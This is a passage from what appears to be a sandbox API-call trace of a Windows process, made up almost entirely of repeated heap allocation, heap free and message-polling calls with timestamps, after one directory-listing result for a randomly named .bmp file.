ftLastWriteTime.dwHighDateTime=0x1d8a68d, nFileSizeHigh=0x0, nFileSizeLow=0x12d7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XUdJWURucyLo9.bmp", cAlternateFileName="XUDJWU~1.BMP")) returned 0 [0201.656] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0201.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0201.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.656] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0201.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0201.656] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0201.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0201.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0201.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 